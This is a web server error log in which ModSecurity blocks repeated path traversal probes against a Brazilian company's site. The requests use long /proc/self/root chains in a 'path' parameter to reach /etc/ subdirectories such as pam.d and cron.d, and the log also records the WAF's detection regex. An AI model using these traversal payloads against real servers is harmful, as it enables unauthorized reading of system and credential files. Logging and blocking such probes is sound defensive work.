[Mon Mar 16 13:57:08.850422 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:39072] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2ZLABkC4fWIHEf8H0mAAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:10.211325 2026] [:error] [pid 10651:tid 140411590858496] [client 74.7.241.46:39080] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2ZrysWC90G-1nBrBK-AAAAZI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:12.603242 2026] [:error] [pid 15568:tid 140411741927168] [client 74.7.241.46:39094] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2aKQpVkWug9HeOt870gAAA0A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:13.954429 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:39110] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2adSswJuvopo3lOhlWwAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:15.143974 2026] [:error] [pid 21805:tid 140411599251200] [client 74.7.241.46:39112] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2a7ABkC4fWIHEf8H0mgAAAFE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:16.562200 2026] [:error] [pid 15568:tid 140411649607424] [client 74.7.241.46:39122] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2bKQpVkWug9HeOt871QAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:17.927062 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:39134] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2bf9ocpUE4ed4uDz2CAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:19.306712 2026] [:error] [pid 15061:tid 140411733534464] [client 74.7.241.46:51670] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2b6TCbgAP5jq5TegxLgAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:20.659806 2026] [:error] [pid 21806:tid 140411683178240] [client 74.7.241.46:51676] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2cNSswJuvopo3lOhlXgAAAIc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:21.903568 2026] [:error] [pid 21533:tid 140411540502272] [client 74.7.241.46:51688] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2cXjZBu2q05ozVU9fPQAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:24.483706 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.241.46:51696] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2dLysWC90G-1nBrBLEQAAAY4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:28.207582 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:51698] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2eKTCbgAP5jq5TegxNgAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:29.594950 2026] [:error] [pid 15061:tid 140411658000128] [client 74.7.241.46:59860] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2eaTCbgAP5jq5TegxOQAAAso"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:30.956575 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.241.46:59864] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2ev9ocpUE4ed4uDz2DQAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:32.335275 2026] [:error] [pid 21533:tid 140411624429312] [client 74.7.241.46:59878] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2fHjZBu2q05ozVU9fQQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:34.959475 2026] [:error] [pid 15061:tid 140411624429312] [client 74.7.241.46:59890] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2faTCbgAP5jq5TegxPQAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:36.403353 2026] [:error] [pid 21533:tid 140411582465792] [client 74.7.241.46:59900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2gHjZBu2q05ozVU9fQwAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:37.639835 2026] [:error] [pid 10651:tid 140411582465792] [client 74.7.241.46:59912] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2gbysWC90G-1nBrBLJwAAAZM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:57:39.060022 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:59416] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2g3jZBu2q05ozVU9fRQAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:58:12.232738 2026] [:error] [pid 10651:tid 140411574073088] [client 74.7.243.203:56972] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2pLysWC90G-1nBrBLZgAAAZQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:58:39.100381 2026] [:error] [pid 14895:tid 140411632822016] [client 74.7.243.203:44104] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2v1ajLEzk2WiQ-10Y5wAAAo0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 13:58:55.556170 2026] [:error] [pid 21533:tid 140411733534464] [client 74.7.241.46:59428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg2z3jZBu2q05ozVU9fmwAAAUE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
